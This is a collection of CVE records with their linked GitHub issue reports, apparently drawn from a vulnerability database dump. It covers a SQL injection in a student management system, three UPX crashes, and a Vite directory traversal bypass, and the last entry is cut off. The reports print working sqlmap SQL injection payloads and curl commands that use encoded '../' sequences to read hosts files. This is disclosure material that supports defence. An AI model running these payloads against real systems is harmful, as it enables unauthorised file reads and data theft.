[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/beicheng-maker/vulns/issues/4" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.206634" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/beicheng-maker/vulns/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.206634" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:student_management_system_project:student_management_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "8A7EC412-2363-438C-8AE6-6483F8FF7D15", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/beicheng-maker/vulns/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "beicheng-maker", "vulns" ]
Sql injection vulnerability exists in the page ID code parameter of Student Management System, which can be exploited by attackers to obtain sensitive information and cause data leakage. ![image](https://user-images.githubusercontent.com/63102521/185157456-6aed3831-ef36-446a-b1f1-01a0de0330d4.png) Sqlmap attack ![image](https://user-images.githubusercontent.com/63102521/185157505-d11422a3-e0a6-4f59-8325-d10fa471ef9f.png) Payload ``` --- Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: q=singleblog&id=2019009' RLIKE (SELECT (CASE WHEN (3975=3975) THEN 2019009 ELSE 0x28 END))-- APsb Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: q=singleblog&id=2019009' AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(6331=6331,1))),0x7170717071),6331)-- suyx --- ``` Downloadsource: ``` https://www.sourcecodester.com/sites/default/files/download/oretnom23/studentmanagement.zip ```
Sql injection exists for Student Management System page ID
https://api.github.com/repos/beicheng-maker/vulns/issues/4/comments
0
2022-08-17T14:18:09Z
2022-08-17T14:18:09Z
https://github.com/beicheng-maker/vulns/issues/4
1,341,838,521
4
3,997
CVE-2020-27787
2022-08-18T19:15:14.210
A Segmentaation fault was found in UPX in invert_pt_dynamic() function in p_lx_elf.cpp. An attacker with a crafted input file allows invalid memory address access that could lead to a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/e2f60adc95334f47e286838dac33160819c5d74d" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/333" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/e2f60adc95334f47e286838dac33160819c5d74d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/333" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*", "matchCriteriaId": "2A4A2432-18AE-4B27-A527-030DD9D34F93", "versionEndExcluding": "3.96", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/upx/upx/issues/333
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
## Environment A crafted input will lead to crash in p_lx_elf.cpp at UPX 3.96(latest version,git clone from branch devel) upx 3.96-git-1bb93d4fce9f+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov Triggered by ./upx.out -d -f -o foo ../../upx_poc2 --info OS: Ubuntu 16.04.6 LTS CPU architecture: x86_64 ## POC [poc](https://github.com/cxy20103657/software_poc/blob/master/upx_poc2) ## Problem The debug information is as follows: open BUILD_TYPE_DEBUG ?= 1 BUILD_TYPE_SANITIZE ?= 1 root@ubuntu:/home/upx_tc/upx_debug_2/src# ./upx.out -d -f -o foo ../../upx_poc2 --info Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-1bb93d+ Markus Oberhumer, Laszlo Molnar & John Reiser Jan 12th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- #ASAN:SIGSEGV ================================================================= ==11637==ERROR: AddressSanitizer: SEGV on unknown address 0x632000014810 (pc 0x00000087d00d bp 0x7ffedceeaf20 sp 0x7ffedceeaef0 T0) #0 0x87d00c in acc_ua_get_le64(void const*) /home/upx_tc/upx_debug_2/src/miniacc.h:6208 #1 0x45eace in get_le64(void const*) /home/upx_tc/upx_debug_2/src/bele.h:184 #2 0x883e8f in N_BELE_RTP::LEPolicy::get64(void const*) const /home/upx_tc/upx_debug_2/src/bele_policy.h:194 #3 0x58d1ff in Packer::get_te64(void const*) const (/home/upx_tc/upx_debug_2/src/upx.out+0x58d1ff) #4 0x5757ce in PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*) /home/upx_tc/upx_debug_2/src/p_lx_elf.cpp:5173 #5 0x5664cc in PackLinuxElf64::unpack(OutputFile*) /home/upx_tc/upx_debug_2/src/p_lx_elf.cpp:4663 #6 0x797e50 in Packer::doUnpack(OutputFile*) /home/upx_tc/upx_debug_2/src/packer.cpp:107 #7 0x7db436 in PackMaster::unpack(OutputFile*) /home/upx_tc/upx_debug_2/src/packmast.cpp:269 #8 0x885565 in do_one_file(char const*, char*) /home/upx_tc/upx_debug_2/src/work.cpp:160 #9 0x8868c2 in do_files(int, int, char**) /home/upx_tc/upx_debug_2/src/work.cpp:271 #10 0x468b28 in main /home/upx_tc/upx_debug_2/src/main.cpp:1539 #11 0x7feefab6482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x4030f8 in _start (/home/upx_tc/upx_debug_2/src/upx.out+0x4030f8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/upx_tc/upx_debug_2/src/miniacc.h:6208 acc_ua_get_le64(void const*) ==11637==ABORTING
Segmentation fault in PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5173
https://api.github.com/repos/upx/upx/issues/333/comments
4
2020-01-14T07:02:22Z
2022-08-18T21:41:23Z
https://github.com/upx/upx/issues/333
549,373,236
333
3,998
CVE-2020-27790
2022-08-18T19:15:14.270
A floating point exception issue was discovered in UPX in PackLinuxElf64::invert_pt_dynamic() function of p_lx_elf.cpp file. An attacker with a crafted input file could trigger this issue that could cause a crash leading to a denial of service. The highest impact is to Availability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/eb90eab6325d009004ffb155e3e33f22d4d3ca26" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/331" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/eb90eab6325d009004ffb155e3e33f22d4d3ca26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/331" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*", "matchCriteriaId": "2A4A2432-18AE-4B27-A527-030DD9D34F93", "versionEndExcluding": "3.96", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "369" ]
369
https://github.com/upx/upx/issues/331
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
## The environment A crafted input will lead to crash in p_lx_elf.cpp at UPX 3.96(latest version,git clone from branch devel) root@ubuntu:/home/upx_cp_2/src# ./upx.out --version upx 3.96-git-0f4975fd7ffb+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov Triggered by ./upx.out -1 POC OS: Ubuntu 16.04.6 LTS CPU architecture: x86_64 ## POC [poc](https://github.com/cxy20103657/software_poc/blob/master/poc) ## The Problem The debug information is as follows: open BUILD_TYPE_DEBUG ?= 1 BUILD_TYPE_SANITIZE ?= 1 root@ubuntu:/home/upx_cp_2/src# ./upx.out -1 /home/upx_out_cp/crashes/poc Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-0f4975+ Markus Oberhumer, Laszlo Molnar & John Reiser Jan 12th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- p_lx_elf.cpp:5108:42: runtime error: division by zero Floating point exception root@ubuntu:/home/upx_cp_2/src# gdb upx.out GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1 Copyright (C) 2016 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from upx.out...done. gdb-peda$ set args -1 /home/upx_out_cp/crashes/poc gdb-peda$ r Starting program: /home/upx_cp_2/src/upx.out -1 /home/upx_out_cp/crashes/poc [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-0f4975+ Markus Oberhumer, Laszlo Molnar & John Reiser Jan 12th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- p_lx_elf.cpp:5108:42: runtime error: division by zero Program received signal SIGFPE, Arithmetic exception. [----------------------------------registers-----------------------------------] RAX: 0x858 RBX: 0xffffffff968 --> 0x0 RCX: 0x74051a61d47fab1f RDX: 0x0 RSI: 0x7fffffffca80 --> 0x7fffffffccf0 --> 0x7fffffffd360 --> 0x7fffffffd3a0 --> 0x7fffffffd560 --> 0x7fffffffd5a0 (--> ...) RDI: 0x0 RBP: 0x7fffffffccf0 --> 0x7fffffffd360 --> 0x7fffffffd3a0 --> 0x7fffffffd560 --> 0x7fffffffd5a0 --> 0x7fffffffd5d0 (--> ...) RSP: 0x7fffffffca90 --> 0x7fffffffcb40 --> 0x41b58ab3 RIP: 0x573627 (<PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8865>: div rdi) R8 : 0x1 R9 : 0x9 ('\t') R10: 0x0 R11: 0x246 R12: 0x7fffffffccc0 --> 0x7fffffffccf0 --> 0x7fffffffd360 --> 0x7fffffffd3a0 --> 0x7fffffffd560 --> 0x7fffffffd5a0 (--> ...) R13: 0x7fffffffcb40 --> 0x41b58ab3 R14: 0x61b00001f180 --> 0x965330 --> 0x4dfb9c (<PackLinuxElf64amd::~PackLinuxElf64amd()>: push rbp) R15: 0x63000000f2e0 --> 0x0 EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x573615 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8847>: sub rax,QWORD PTR [rbp-0x1f0] 0x57361c <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8854>: mov edi,DWORD PTR [rbp-0x224] 0x573622 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8860>: mov edx,0x0 => 0x573627 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8865>: div rdi 0x57362a <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8868>: mov r14d,eax 0x57362d <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8871>: mov rax,QWORD PTR [rbp-0x248] 0x573634 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8878>: cmp QWORD PTR [rbp-0x248],0x0 0x57363c <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8886>: je 0x573649 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8899>: je 0x573649 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8899> [------------------------------------stack-------------------------------------] 0000| 0x7fffffffca90 --> 0x7fffffffcb40 --> 0x41b58ab3 0008| 0x7fffffffca98 --> 0xffffffff --> 0x0 0016| 0x7fffffffcaa0 --> 0x63000000f398 --> 0x0 0024| 0x7fffffffcaa8 --> 0x61b00001f180 --> 0x965330 --> 0x4dfb9c (<PackLinuxElf64amd::~PackLinuxElf64amd()>: push rbp) 0032| 0x7fffffffcab0 --> 0x0 0040| 0x7fffffffcab8 --> 0xb00000018 --> 0x0 0048| 0x7fffffffcac0 --> 0x90000000a --> 0x0 0056| 0x7fffffffcac8 --> 0xc ('\x0c') [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGFPE 0x0000000000573627 in PackLinuxElf64::invert_pt_dynamic (this=0x61b00001f180, dynp=0x63000000f398) at p_lx_elf.cpp:5108 5108 symnum_end = (v_str - v_sym) / sz_sym; gdb-peda$
SIGFPE divide by zero in PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5108
https://api.github.com/repos/upx/upx/issues/331/comments
2
2020-01-13T07:11:42Z
2022-08-18T21:42:09Z
https://github.com/upx/upx/issues/331
548,744,640
331
3,999
CVE-2022-35204
2022-08-18T19:15:14.550
Vitejs Vite before v2.9.13 was discovered to allow attackers to perform a directory traversal via a crafted URL to the victim's service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/vitejs/vite/issues/8498" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/vitejs/vite/releases/tag/v2.9.13" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/vitejs/vite/releases/tag/v3.0.0-beta.4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/vitejs/vite/issues/8498" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/vitejs/vite/releases/tag/v2.9.13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/vitejs/vite/releases/tag/v3.0.0-beta.4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vitejs:vite:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "BA74D018-9C42-4064-99A8-59E31BAB5856", "versionEndExcluding": "2.9.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/vitejs/vite/issues/8498
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "vitejs", "vite" ]
### Describe the bug The vulnerability found at https://github.com/vitejs/vite/issues/2820 was found to be not fixed properly, which leads to the unrestricted directory traversal. Currently the `@fs` directory does check for the allowed path, but it does not check for encoded paths. For example, assuming that `/@fs/home/test/` is the only allowed path, this can be bypassed by accessing `/@fs/home/test/%2e%2e%2f%2e%2e%2f`, which translates to `/@fs/home/test/../../` internally. Since this way of access through the browser may output an inconsistent result, `curl --path-as-is` can be used as an alternative way to reproduce such issue. ### Reproduction Any vite project is affected by this vulnerability. ```sh npm init @vitejs/app app cd app npm install npm run dev ``` #### Reproduction in Windows Accessing `C:/Windows/System32/drivers/etc/hosts` is blocked since the allow list only contains `C:/Users/stypr/Desktop/development/q/vite-project`. ```bash $ curl --path-as-is -v "http://localhost:3001/@fs/C:/Windows/System32/drivers/etc/hosts" * Trying ::1:3001... * Trying 127.0.0.1:3001... * Connected to localhost (127.0.0.1) port 3001 (#0) > GET /@fs/C:/Windows/System32/drivers/etc/hosts HTTP/1.1 > Host: localhost:3001 > User-Agent: curl/7.75.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 403 Forbidden < Access-Control-Allow-Origin: * < Date: Wed, 08 Jun 2022 04:00:32 GMT < Connection: keep-alive < Keep-Alive: timeout=5 < Transfer-Encoding: chunked < <body> <h1>403 Restricted</h1> <p>The request url "C:/Windows/System32/drivers/etc/hosts" is outside of Vite serving allow list.<br/><br/>- C:/Users/stypr/Desktop/development/q/vite-project<br/><br/>Refer to docs https://vitejs.dev/config/#server-fs-allow for configurations and more details.</p> <style> body { padding: 1em 2em; } </style> </body> * Connection #0 to host localhost left intact * ``` What if we access like `C:/Users/stypr/Desktop/development/q/vite-project/../../../../../../Windows/System32/drivers/etc/hosts`? In typical cases, this doesn't work However, if we replace the path `../` as `%2e%2e%2f` and replace every trailing slashes to `%2f`, the check is bypassed and the path traversal becomes successful. ```bash $ curl --path-as-is -v "http://localhost:3001/@fs/C:/Users/stypr/Desktop/development/q/vite-project/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts" * Trying ::1:3001... * Trying 127.0.0.1:3001... * Connected to localhost (127.0.0.1) port 3001 (#0) > GET /@fs/C:/Users/stypr/Desktop/development/q/vite-project/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts HTTP/1.1 > Host: localhost:3001 > User-Agent: curl/7.75.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Access-Control-Allow-Origin: * < Content-Length: 824 < Content-Type: < Last-Modified: Tue, 31 May 2022 03:15:34 GMT < ETag: W/"824-1653966934106" < Cache-Control: no-cache < Date: Wed, 08 Jun 2022 03:53:26 GMT < Connection: keep-alive < Keep-Alive: timeout=5 < # Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost *a Connection #0 to host localhost left intact ``` #### Reproduction in Linux Linux is also pretty much the same, you can first get the whitelist path (`/srv/q/app`) by accessing a random path(`/@fs/...`), and then do a path traversal based on the given whitelist. ```bash curl -v --path-as-is "http://192.168.125.129:3000/@fs/srv/q/app/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts" * Trying 192.168.125.129:3000... * TCP_NODELAY set * Connected to 192.168.125.129 (192.168.125.129) port 3000 (#0) > GET /@fs/srv/q/app/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts HTTP/1.1 > Host: 192.168.125.129:3000 > User-Agent: curl/7.68.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Access-Control-Allow-Origin: * < Content-Length: 221 < Content-Type: < Last-Modified: Tue, 30 Jun 2020 09:41:51 GMT < ETag: W/"221-1593510111311" < Cache-Control: no-cache < Date: Wed, 08 Jun 2022 04:09:49 GMT < Connection: keep-alive < Keep-Alive: timeout=5 < 127.0.0.1 localhost 127.0.1.1 ubuntu # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters * Connection #0 to host 192.168.125.129 left intact ``` ### System Info Windows ```shell System: OS: Windows 10 10.0.19044 CPU: (16) x64 AMD Ryzen 7 3800X 8-Core Processor Memory: 33.13 GB / 63.93 GB Binaries: Node: 16.13.2 - C:\Program Files\nodejs\node.EXE Yarn: 1.22.10 - ~\AppData\Roaming\npm\yarn.CMD npm: 8.1.2 - C:\Program Files\nodejs\npm.CMD Browsers: Edge: Spartan (44.19041.1266.0), Chromium (102.0.1245.33) Internet Explorer: 11.0.19041.1566 npmPackages: @vitejs/plugin-vue: ^2.3.3 => 2.3.3 vite: ^2.9.9 => 2.9.10 ``` Linux ``` System: OS: Linux 5.13 Ubuntu 20.04.3 LTS (Focal Fossa) CPU: (6) x64 AMD Ryzen 7 3800X 8-Core Processor Memory: 12.21 GB / 15.59 GB Container: Yes Shell: 5.0.17 - /bin/bash Binaries: Node: 14.18.3 - /usr/bin/node Yarn: 1.22.10 - /usr/bin/yarn npm: 6.14.15 - /usr/bin/npm Browsers: Chrome: 97.0.4692.99 Firefox: 100.0.2 ``` ### Used Package Manager npm ### Validations - [X] Follow our [Code of Conduct](https://github.com/vitejs/vite/blob/main/CODE_OF_CONDUCT.md) - [X] Read the [Contributing Guidelines](https://github.com/vitejs/vite/blob/main/CONTRIBUTING.md). - [X] Read the [docs](https://vitejs.dev/guide). - [X] Check that there isn't [already an issue](https://github.com/vitejs/vite/issues) that reports the same bug to avoid creating a duplicate. - [X] Make sure this is a Vite issue and not a framework-specific issue. For example, if it's a Vue SFC related bug, it should likely be reported to https://github.com/vuejs/core instead. - [X] Check that this is a concrete bug. For Q&A open a [GitHub Discussion](https://github.com/vitejs/vite/discussions) or join our [Discord Chat Server](https://chat.vitejs.dev/). - [X] The provided reproduction is a [minimal reproducible example](https://stackoverflow.com/help/minimal-reproducible-example) of the bug.
Unrestricted directory traversal with `@fs` (Bypass)
https://api.github.com/repos/vitejs/vite/issues/8498/comments
4
2022-06-08T04:16:20Z
2022-07-23T00:24:39Z
https://github.com/vitejs/vite/issues/8498
1,264,168,583
8,498
4,000
CVE-2020-27788
2022-08-18T20:15:08.947
An out-of-bounds read access vulnerability was discovered in UPX in PackLinuxElf64::canPack() function of p_lx_elf.cpp file. An attacker with a crafted input file could trigger this issue that could cause a crash leading to a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/1bb93d4fce9f1d764ba57bf5ac154af515b3fc83" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/332" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/1bb93d4fce9f1d764ba57bf5ac154af515b3fc83" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/332" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*", "matchCriteriaId": "2A4A2432-18AE-4B27-A527-030DD9D34F93", "versionEndExcluding": "3.96", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/upx/upx/issues/332
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
## Environment A crafted input will lead to crash in p_lx_elf.cpp at UPX 3.96(latest version,git clone from branch devel) root@ubuntu:/home/upx_cp_2/src# ./upx.out --version upx 3.96-git-0f4975fd7ffb+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov ## POC [poc](https://github.com/cxy20103657/software_poc/blob/master/upx_poc1) ## Problem The debug information is as follows: open BUILD_TYPE_DEBUG ?= 1 BUILD_TYPE_SANITIZE ?= 1 root@ubuntu:/home/upx_cp_2/src# ./upx.out -1 /home/upx_out_cp/crashes/poc1 Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-0f4975+ Markus Oberhumer, Laszlo Molnar & John Reiser Jan 12th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- ================================================================= ==104331==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000001f269 at pc 0x7fcdfaf852fd bp 0x7ffc36d39f70 sp 0x7ffc36d39718 READ of size 1 at 0x63000001f269 thread T0 #0 0x7fcdfaf852fc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x472fc) #1 0x5077e1 in PackLinuxElf64::canPack() /home/upx_cp_2/src/p_lx_elf.cpp:2385 #2 0x7cbd70 in try_pack /home/upx_cp_2/src/packmast.cpp:91 #3 0x7d37e2 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/upx_cp_2/src/packmast.cpp:194 #4 0x7d9bee in PackMaster::getPacker(InputFile*) /home/upx_cp_2/src/packmast.cpp:240 #5 0x7da15b in PackMaster::pack(OutputFile*) /home/upx_cp_2/src/packmast.cpp:260 #6 0x884dc8 in do_one_file(char const*, char*) /home/upx_cp_2/src/work.cpp:158 #7 0x88624e in do_files(int, int, 